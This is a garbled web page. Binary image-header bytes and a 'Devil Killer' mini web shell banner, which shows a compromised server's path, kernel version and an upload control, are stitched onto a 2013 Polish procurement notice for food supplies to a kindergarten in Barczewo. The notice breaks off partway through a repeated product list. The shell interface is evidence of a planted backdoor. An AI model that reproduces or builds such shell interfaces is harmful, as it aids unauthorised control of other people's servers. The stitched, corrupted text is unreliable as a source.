JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130809/321972-N-2013.html

<p class="kh_header"><b>Barczewo: ZAKUP,DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE</b><br>
<b>Numer ogłoszenia: 321972 - 2013; data zamieszczenia: 09.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Miejskie w Barczewie , ul. Słowackiego 7, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 89 5148396, faks 89 5148396.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP,DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienia obejmują 6części:
MP 341.1.2013                                                                                                                    ZAŁĄCZNIK NR 1

Szczegółowy opis przedmiotu zamówienia dla poszczególnych części

CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Jaja kurze klasa M
Szt
4100
2.
Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna
Kg
120
3.
Makaron drobny gwiazdki,muszelkiop.250-500g
Kg
20
4.
Płatki owsiane op500g
Kg
15
5.
Płatki jęczmienne op500g
Kg
15
6.
Kasza manna 1000g
Kg
30
7.
Kasza kukurydziana op.250-500g
Kg
12
8.
Kasza jaglana op.400-500g
Kg
18
9.
Kasza  jęczmienna średnia op.400-500g
Kg
48
10.
Kasza gryczana prażona op.400-1000g
Kg
30
11.
Kasza pęczak op.400-500g
Kg
10
12.
Mąka pszenna typ 550op.1000g
Kg
300
13.
Mąka ziemniaczana op.500-1000g
Kg
5
14.
Płatki ryżowe op.250-500g
Kg
15
15.
Ryż biały długoziarnisty op.1000g
Kg
75
16.
Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
14
17.
Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
14
18.
Cukier biały kryształ,pakowany op.1000g
Kg
450
19.
Dżem niskosłodzony różne smaki op.co najmniej370g
Szt
200
20.
Koncentrat pomidorowy30% op.co najmniej 200g
Szt
220
21.
Sól kuchenna jodowana biała,drobna op.1000g
Kg
150
22.
Sól morska drobnaop.1000g
Kg
10
23.
Kawa zbożowa rozpuszczalna składzbożą72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g
Szt
30
24.
Kakao prawdziwe op.100-200g
Kg
5
25.
Budyń w proszku różne smaki op.waga co najmniej 40g
Szt
600
26.
Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g
Szt
350
27.
Olej z pierwszego tłoczenia rzepakowy op.900-1000g
L
100
28.
Olej słonecznikowy op.900-1000g
L
10
29.
Makaron pełnoziarnisty op.500g
Kg
20
30.
Herbata owocowa,saszetki,pakowanaop.co najmniej50szt
Szt
50
31.
Herbata miętowa saszetki ,pakowana op.co najmniej20szt
Szt
15
32.
Herbata granulowanaop.100g
Szt
70
33.
Krakersy
Kg
20
34.
Biszkopty op.250-500g
Kg
30
35.
Ciastka kruche różne rodzaje op.od 1000-4000g
Kg
50
36.
Ciastka typu markizy
Kg
30
37.
Woda źródlana pakowana op.1500-5000g
L
60
38.
Keczup pomidorowy,łagodny w słoikuop.200g 60-65% koncentratu pom.
Szt
80
39.
Pieprz mielony prawdziwy bez dodatków w oryginalnych op.
Szt
50
40.
Pieprz ziołowy w oryginalnych opakowaniach
Szt
50
41.
Ziele angielskie w oryginalnych opakowaniach
Szt
20
42.
Liść laurowy w oryginalnych opakowaniach
Szt
20
43.
Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.
szt
8
44.
Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik
Szt
20
45.
Kukurydz konserwowa puszka op.400g
Szt
25
46.
Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g
szt
25
47.
Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym
Szt
15
48.
Koncentrat barszczu czerwonego w op. szklanych
szt
10
49.
Groszek konserwowy w puszce w oryginalnych op.400g
Szt
10
50.
Papryka mielona słodka w oryginalnych op.20g
Szt
50
51.
Przyprawa Curry op10-20g
Szt
15
52.
Przyprawa Kurkuma  op.10-20g
Szt
10
53.
Majeranek otarty waga co najmniej 8g
szt
30
54.
Wafle suche prostokątne
Szt
120
55.
Nutella w oryginalnych op.320g lub produkt równoważny.
Szt
12
56.
Zioła prowansalskie w oryginalnych opakowaniach op.10g
szt
40
57.
Cukier waniliowy
szt
60
58.
Kwasek cytrynowy
Szt
30
59.
Musztarda słoik op.co najmniej 180g
szt
20
60.
Miód naturalny wielokwiatowy op.370g
Szt
25
61.
Ananas plastry puszka waga bez odcieku co najmniej 565g
szt
15
62.
Czekolada mleczna 100g
Szt
100
63.
Cukierki czekoladowe typu michałki lub równoważne
Kg
15
64.
Proszek do pieczenia
Szt 
15
65.
Sok owocowo-warzywny op.co najmniej 700ml
L
350
66.
Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml
L
80
67.
Makrela w sosie pomidorowym bez warzyw op co najmnie 200g
Szt
120
68.
Paprykarz  op co najmniej 150g
Szt
20
69.
Cukier puder op.co najmniej 500g
Kg
4
70.
Tymianek suszony waga co najmniej10g
Szt
10
71.
Oregano suszone waga co najmniej 10g
Szt
10

CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Karkówka surowa wieprzowa bez kości
Kg
90
2.
Łopatka wieprzowa surowa bez kości
Kg
300
3.
Wołowina surowa zrazowa bez kości
Kg
50
4.
Szynka wieprzowa surowa bez kości
Kg
60
5.
Filet z indyka surowy
Kg
40
6.
Filet z kurczaka surowy
Kg
130
7.
Schab bez kości surowy 
Kg
40
8.
Udka bez grzbietu z kurczaka surowe
Kg
150
9.
Antrykot wołowy surowy
Kg
15
10.
Żebra wołowe surowe
Kg
15
11.
Porcje rosołowe z kurczaka
Kg
50
12.
Wątróbka drobiowa surowa
Kg
30
13.
Parówki wieprzowe cienkie zawierające co najmniej 60% mięsa wp.
Kg
50
14.
Ogonówka wp. parzona zawierajaca co najmniej 64% mięsa wp.
Kg
15
15.
Schab wędzony parzony zawierajacy co najmniej 73% mięsa wp.
kg
15
16.
Polędwica wp wędzona parzona zawierajaca co najmniej 63% miesa wp.
Kg
15
17.
Szynka wędzona parzona  mieso wp. 100%
kg
25
18.
Kiełbasa wp-baton zawierajaca 100% mięsa wp.
Kg
25
19.
Szynka wędzona parzona -mięso wp.77%
Kg
25
20.
Szynka konserwowa-mięso wp 65%
Kg
15
21.
Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.
kg
30
22.
Kiełbasa wp.cienka zawierajaca co najmniej 79% misa wp.
Kg
30
23.
Pieczeń wp. zawierajaca co najmniej 60% miesa wp.
Kg
20
24.
Mielonka wp. zawierajaca co najmniej 70% miesa wp.
kg
15
25.
Filet wędzony z indyka  zawartość mięsa z indyka  co najmniej 90%
kg
15
26.
Filet wędzony drobiowy zawirajacy co najmniej47% mięsa z kury.
Kg
15
27
Parówki drobiowe zawierająca co najmniej 60% miesa drobiowego
kg
30
28
Polędwica drobiowa z kurczaka z majerankiem zawierająca co najmniej 45% filetu z kurczaka
kg
15
29
Piers miodowa z indyka zawierająca co najmniej 51% filetu z kurczaka
kg
15
30
Kiełbasa wp.baton zawierająca co najmniej 60% miesa wp.
Kg
20
31
Łopatka pieczona -mięso wp.co najmniej 85%
Kg
20
32
Smalec wp. kostka 200-250g
Kg
20
33
Pasztet pieczony drobiowy zawierający co najmniej 38% miesa wp.
kg
25
34
Pasztet pieczony wp.zawierajacy co najmniej 30% miesa wp.
Kg
25
35
Boczek wędzony parzony
Kg
15



CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców,orzechów.
CPV:  03.20.00.00-3
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Ziemniaki
kg
3500
2.
Marchew świeża korzeń
kg
250
3.
Pietruszka świeża korzeń
kg
30
4.
Cebula biała
kg
50
5.
Cebula czerwona
kg
10
6.
Seler świezy korzeń
kg
80
7.
Por świeży
kg
40
8.
Kapusta czerwona 
kg
40
9.
Pieczarki świeże 
kg
40
10.
Czosnek kraj pochodzenie polska głowka 
szt
50
11.
Szczypior świeży pęczek
szt
100
12.
Rzodkiewka pęczek
szt
100
13.
Rzodkiew biała świeża
Kg
40
14
Sałata lodowa ,pakowana główka
szt
40
15
Sałata  zielona świeża główka
Szt
50
16
Pomidory czerwone, świeże
kg
90
17
Ogórek swieży,zielony szklarniowy
kg
80
18
Ogórek kwaszony
Kg
40
19
Kapusta kwaszona biała
kg
120
20
Kapusta pekinska 
kg
30
21
Kapusta biała słodka  główka
kg
120
22
Papryka czerwona ,żółta,zielona
kg
25
23
Cytryna świeża
Kg
25
24
Jabłka świeże
kg
900
25
Banany świeże
kg
150
26
Gruszki świeże
kg
90
27
kiwi
Kg
40
28
Mandarynki  świeże
kg
150
29
Winogrona zielone bezpestkowe
kg
40
30
arbuzy
Kg
20
31
Śliwka fioletowa duża
kg
30
32
Brzoskwinie
kg
30
33
nektarynki
kg
30
34
morele
kg
30
35
Koper zielony,świeży pęczek 100g
Szt
300
36
Natka pietruszki świeza pęczek  100g
szt
300
37
Burak czerwony świeży
Kg
200
38
Rodzynki op.co najmniej 100g-150g
Szt
20
39
Orzechy włoskie łuskane op.co najmniej100g
szt
10
40
Fasola sucha średnia  op.400-1000g
Kg
20
41
Groch połówki op. 400-1000g
kg
20
42
Pietruszka suszona natka op.50-100g
kg
1
43
Włoszczyzna suszona op.100-200g
kg
1
44
Koper zielony suszony op 50-100g
kg
1
45
Pestki słonecznika op.50-150g
kg
1
46
Żurawina suszona op.250-500g
kg
3
47
Cebulka suszona op.50-100g
kg
1





 
CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrozone) PCV 15.20.00.00-0;15.33.11.70-9)                                    
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g
kg
640
2.
Mieszanka 7-składnikowa z kapusta 2000-2500g
kg
110
3.
Brokuły mrożone 450g-2500g
kg
150
4.
Kalafior mrożony op.450-2500g
kg
150
5
Fasolka szparagowa żółta cięta op.450-2500g
kg
120
6
Fasolka szparagowa zielona cieta op.450-2500g
kg
120
7
Szpinak mrożony mielony.op.450-2500g
Kg
60
8 
Groszek zielony mrożony op.450-2500g
kg
45
9
Barszcz ukraiński skład:(burak ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g
kg
60
10
Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 
Kg
300
11
Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna
kg
250
12
Truskawka mrożona op.450-2500g
Kg
80
13
Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g
Kg
100
14
Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g
kg
80
15
Marchew kostka op.450-2500g
kg
100
16
Marchew z groszkiem op.450-2500g
Kg
100
17
Wiśnia b)p op.450-2500g
Kg
45
18
Porzeczka czarna mrożona op.450-2500g
kg
45
19
Dorsz filet SHP
kg
54
20
Miruna filet SHP
kg
54
21
Morszczuk filet SHP
kg
20
22
Mintaj filet SHP
kg
30
23
Makrela wędzona
Kg
28
24
Włoszczyzna 3-składnikowa paski op.450-2500g
Kg
150
25
Pyzy z mięsem op.500-1000g
kg
50

CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3

Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Mleko folia 2%op.1000ml
L
4600
2.
Serek topiony o smaku śmietankowym o zawartości tłuszczu co najmniej 24g  op.100g
szt
210
3.
Mleko UHT op.1000ml 2%
L
150
4.
Mleko UHT op.1000ml 3,2%
L
50
5.
Masło ekstra zawierajace co najmniej 82% tłuszczu
kg
200
6.
Jogurt wielosmakowy,waga op.co najmniej150g
szt
1000
7.
Serek homogenizowany wanilia op.co najmniej 135g
szt
880
8.
 Deser waniliowy pakowany op. co najmniej120g
szt
250
9.
Jogurt z kawałkami owoców,waga op.co najmnie150g
szt
1000
10.
Jogurt owocowy (Milko) do picia lub równoważny op.500ml
szt
500
11
Ser żółty zawierajacy co najmniej 45% tłuszczu.
kg
55
12
Śmietana 12% op.200-400g
L
200
13
Śmietana 18% op.200-400g
L
150
14
Twaróg krajanka półtłusty
kg
200
15
Jogurt naturalny op. co najmniej 400ml
L
15
16
Serek topiony kostka 100g z szynka
Szt 
60

CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-9
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Chleb krojony500g
Szt.
1300
2
Chleb razowy krojony 400g
szt
830
3
Bułki kajzerki 50g
szt
1000
4
Bułka grahamka co najmniej 80-90g
szt
800
5
Chleb wieloziarnisty waga co najmniej 400-500g
szt
100
6
Ciasto drożdżowe
kg
120
7
Chałka zdobna co najmniej 250g
szt
120
8
Babka piaskowa
Kg
60
9
Rogaliki krucho -drozdżowe nadziewane
kg
120
10
Rogale maślane co najmnie 50g
szt
500
11
Bułki czerstwe co najmniej waga 50g
szt
350
12
Bułka tarta
kg
50
13
Bułka słodka z marmolada waga co najmniej 50g
szt
200
14
piernik
Kg
50.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta - załączniki  nr 2 (wraz z wypełnionymi tabelami)
2.Oświadczenie -załącznik nr 3
3.Ośwaiadczenie - załącznik nr 4
4.Ośwaidczenie - załącznik nr 5
5.Oświadczenie - załącznik nr 6
6.Parafowana umowa - załącznik nr 7
7.Oświadczenie lub zaświadczenia - załącznik nr 8</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.barczewo.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miejskie w Barczewie ul.Słowackiego7 11-010 Barczewo pokój nr104 w godz.8:00-13:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2013 godzina 09:00, miejsce: Przedszkole Miejskie w Barczewie ul.Słowackiego7 11-010 Barczewo pokój nr104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Jaja kurze klasa M
Szt
4100
2.
Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna
Kg
120
3.
Makaron drobny gwiazdki,muszelkiop.250-500g
Kg
20
4.
Płatki owsiane op500g
Kg
15
5.
Płatki jęczmienne op500g
Kg
15
6.
Kasza manna 1000g
Kg
30
7.
Kasza kukurydziana op.250-500g
Kg
12
8.
Kasza jaglana op.400-500g
Kg
18
9.
Kasza  jęczmienna średnia op.400-500g
Kg
48
10.
Kasza gryczana prażona op.400-1000g
Kg
30
11.
Kasza pęczak op.400-500g
Kg
10
12.
Mąka pszenna typ 550op.1000g
Kg
300
13.
Mąka ziemniaczana op.500-1000g
Kg
5
14.
Płatki ryżowe op.250-500g
Kg
15
15.
Ryż biały długoziarnisty op.1000g
Kg
75
16.
Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
14
17.
Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
14
18.
Cukier biały kryształ,pakowany op.1000g
Kg
450
19.
Dżem niskosłodzony różne smaki op.co najmniej370g
Szt
200
20.
Koncentrat pomidorowy30% op.co najmniej 200g
Szt
220
21.
Sól kuchenna jodowana biała,drobna op.1000g
Kg
150
22.
Sól morska drobnaop.1000g
Kg
10
23.
Kawa zbożowa rozpuszczalna składzbożą72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g
Szt
30
24.
Kakao prawdziwe op.100-200g
Kg
5
25.
Budyń w proszku różne smaki op.waga co najmniej 40g
Szt
600
26.
Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g
Szt
350
27.
Olej z pierwszego tłoczenia rzepakowy op.900-1000g
L
100
28.
Olej słonecznikowy op.900-1000g
L
10
29.
Makaron pełnoziarnisty op.500g
Kg
20
30.
Herbata owocowa,saszetki,pakowanaop.co najmniej50szt
Szt
50
31.
Herbata miętowa saszetki ,pakowana op.co najmniej20szt
Szt
15
32.
Herbata granulowanaop.100g
Szt
70
33.
Krakersy
Kg
20
34.
Biszkopty op.250-500g
Kg
30
35.
Ciastka kruche różne rodzaje op.od 1000-4000g
Kg
50
36.
Ciastka typu markizy
Kg
30
37.
Woda źródlana pakowana op.1500-5000g
L
60
38.
Keczup pomidorowy,łagodny w słoikuop.200g 60-65% koncentratu pom.
Szt
80
39.
Pieprz mielony prawdziwy bez dodatków w oryginalnych op.
Szt
50
40.
Pieprz ziołowy w oryginalnych opakowaniach
Szt
50
41.
Ziele angielskie w oryginalnych opakowaniach
